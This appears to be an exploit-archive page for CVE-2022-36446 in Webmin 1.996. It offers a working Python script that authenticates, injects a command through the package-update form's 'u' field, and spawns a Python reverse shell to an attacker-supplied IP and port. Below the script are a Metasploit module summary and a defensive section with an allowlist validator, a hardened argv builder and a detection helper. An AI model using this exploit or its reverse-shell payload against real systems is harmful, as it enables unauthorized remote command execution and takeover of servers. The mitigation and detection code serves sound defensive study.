Webmin 1.996 Remote Code Execution
Webmin version 1.996 suffers from an authenticated remote code execution vulnerability.
# Exploit Title: Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-07-25
# Exploit Author: Emir Polat
# Technical analysis: https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165
# Vendor Homepage: https://www.webmin.com/
# Software Link: https://www.webmin.com/download.html
# Version: < 1.997
# Tested On: Version 1.996 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)
# CVE: CVE-2022-36446

import argparse
import requests
from bs4 import BeautifulSoup


def login(args):
    global session
    global sysUser
    session = requests.Session()
    # Webmin is normally served over HTTPS with a self-signed certificate;
    # disable verification for every request the session makes.
    session.verify = False
    loginUrl = f"{args.target}:10000/session_login.cgi"
    infoUrl = f"{args.target}:10000/sysinfo.cgi"
    username = args.username
    password = args.password
    data = {'user': username, 'pass': password}
    login = session.post(loginUrl, verify=False, data=data, cookies={'testing': '1'})
    # A successful login sets the 'sid' session cookie; without it there is nothing to continue with.
    if 'sid' not in session.cookies:
        return False
    sysInfo = session.post(infoUrl, verify=False, cookies={'sid': session.cookies['sid']})
    bs = BeautifulSoup(sysInfo.text, 'html.parser')
    # The system-information page carries the logged-in user name in a data-user attribute.
    sysUser = [item["data-user"] for item in bs.find_all() if "data-user" in item.attrs]
    if sysUser:
        return True
    else:
        return False


def exploit(args):
    payload = f"""
    1337;$(python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{args.listenip}",{args.listenport})); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")');
    """
    updateUrl = f"{args.target}:10000/package-updates"
    exploitUrl = f"{args.target}:10000/package-updates/update.cgi"
    # 'u' is the package name that update.cgi hands to the OS package manager without sanitization.
    exploitData = {'mode': 'new', 'search': 'ssh', 'redir': '', 'redirdesc': '', 'u': payload, 'confirm': 'Install+Now'}
    if login(args):
        print("[+] Successfully Logged In !")
        print(f"[+] Session Cookie => sid={session.cookies['sid']}")
        print(f"[+] User Found => {sysUser[0]}")
        res = session.get(updateUrl)
        bs = BeautifulSoup(res.text, 'html.parser')
        # The module page only renders data-module="package-updates" when the user may use that module.
        updateAccess = [item["data-module"] for item in bs.find_all() if "data-module" in item.attrs]
        if updateAccess and updateAccess[0] == "package-updates":
            print(f"[+] User '{sysUser[0]}' has permission to access <<Software Package Updates>>")
            print("[+] Exploit starting ... ")
            print(f"[+] Shell will spawn to {args.listenip} via port {args.listenport}")
            session.headers.update({'Referer': f'{args.target}:10000/package-updates/update.cgi?xnavigation=1'})
            session.post(exploitUrl, data=exploitData)
        else:
            print(f"[-] User '{sysUser[0]}' unfortunately hasn't permission to access <<Software Package Updates>>")
    else:
        print("[-] Login Failed !")


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Webmin < 1.997 - Remote Code Execution (Authenticated)")
    parser.add_argument('-t', '--target', help='Target URL, Ex: https://webmin.localhost', required=True)
    parser.add_argument('-u', '--username', help='Username For Login', required=True)
    parser.add_argument('-p', '--password', help='Password For Login', required=True)
    parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True)
    parser.add_argument('-lp', '--listenport', help='Listening port required to receive reverse shell', required=True)
    parser.add_argument("-s", '--ssl', help="Use if server support SSL.", required=False)
    args = parser.parse_args()
    exploit(args)
Related news
Webmin Package Updates Command Injection
This Metasploit module exploits an arbitrary command injection in Webmin versions prior to 1.997. Webmin uses the OS package manager (apt, yum, etc.) to perform package updates and installation. Due to a lack of input sanitization, it is possible to inject an arbitrary command that will be concatenated to the package manager call. This exploit requires authentication and the account must have access to the Software Package Updates module.
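The root cause described above is a package name that is concatenated straight into a package-manager command string, so a name containing shell metacharacters becomes additional commands. The following is an added illustration, not Webmin's own code (Webmin's apt-lib.pl is Perl): it places the weak string-concatenation pattern beside a hardened form that first checks the name against an allowlist pattern and then passes it as a single argv element with no shell involved. The package-name regular expression is an assumption modelled on Debian's naming rules, and the constructed input `1337;id` stands in for the page's payload shape.

```python
import re
import subprocess

# Assumption: Debian/Ubuntu package names are lowercase letters, digits, '+', '-'
# and '.', at least two characters long and starting with an alphanumeric.
# Shell metacharacters (';', '$', '(', quotes, whitespace) can never match this.
PACKAGE_NAME_RE = re.compile(r"^[a-z0-9][a-z0-9+.-]+$")

# Constructed sample input shaped like the injection: a fake name followed by ';'
# and a harmless command. Any text after the ';' is what a shell would run.
CONSTRUCTED_INJECTION = "1337;id"


def vulnerable_install_command(package: str) -> str:
    """The weak pattern: the user-supplied name is spliced into a shell command
    string. With CONSTRUCTED_INJECTION this yields two shell commands."""
    return "apt-get -y install " + package


def validate_package_name(package: str) -> bool:
    """Allowlist check: True only for names that match the package-name grammar."""
    return bool(PACKAGE_NAME_RE.fullmatch(package))


def safe_install_argv(package: str) -> list:
    """Hardened form: reject anything outside the grammar, then build an argv
    list so the name is a single argument that no shell ever parses.
    The '--' stops a name beginning with '-' from being read as an option."""
    if not validate_package_name(package):
        raise ValueError(f"rejected package name: {package!r}")
    return ["apt-get", "-y", "install", "--", package]


def run_install(package: str, dry_run: bool = True) -> list:
    """Validate and (optionally) execute without shell=True. Returns the argv
    so callers and tests can inspect exactly what would run."""
    argv = safe_install_argv(package)
    if not dry_run:
        subprocess.run(argv, check=True)
    return argv


def suspicious_package_names(names: list) -> list:
    """Defender-side helper: given package names seen in request logs or form
    submissions, return the ones that fail the allowlist and deserve review."""
    return [n for n in names if not validate_package_name(n)]


if __name__ == "__main__":
    print("weak   :", vulnerable_install_command(CONSTRUCTED_INJECTION))
    print("safe   :", run_install("openssh-server"))
    try:
        run_install(CONSTRUCTED_INJECTION)
    except ValueError as err:
        print("blocked:", err)
    print("flagged:", suspicious_package_names(["curl", CONSTRUCTED_INJECTION, "Foo Bar"]))
```

The same allowlist check works as a detection rule over the `u` parameter of submitted `update.cgi` requests: a package-install request whose name fails the grammar is not a legitimate install and is worth alerting on.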
CVE-2022-36446: Comparing 1.996...1.997 · webmin/webmin
software/apt-lib.pl in Webmin before 1.997 lacks HTML escaping for a UI command.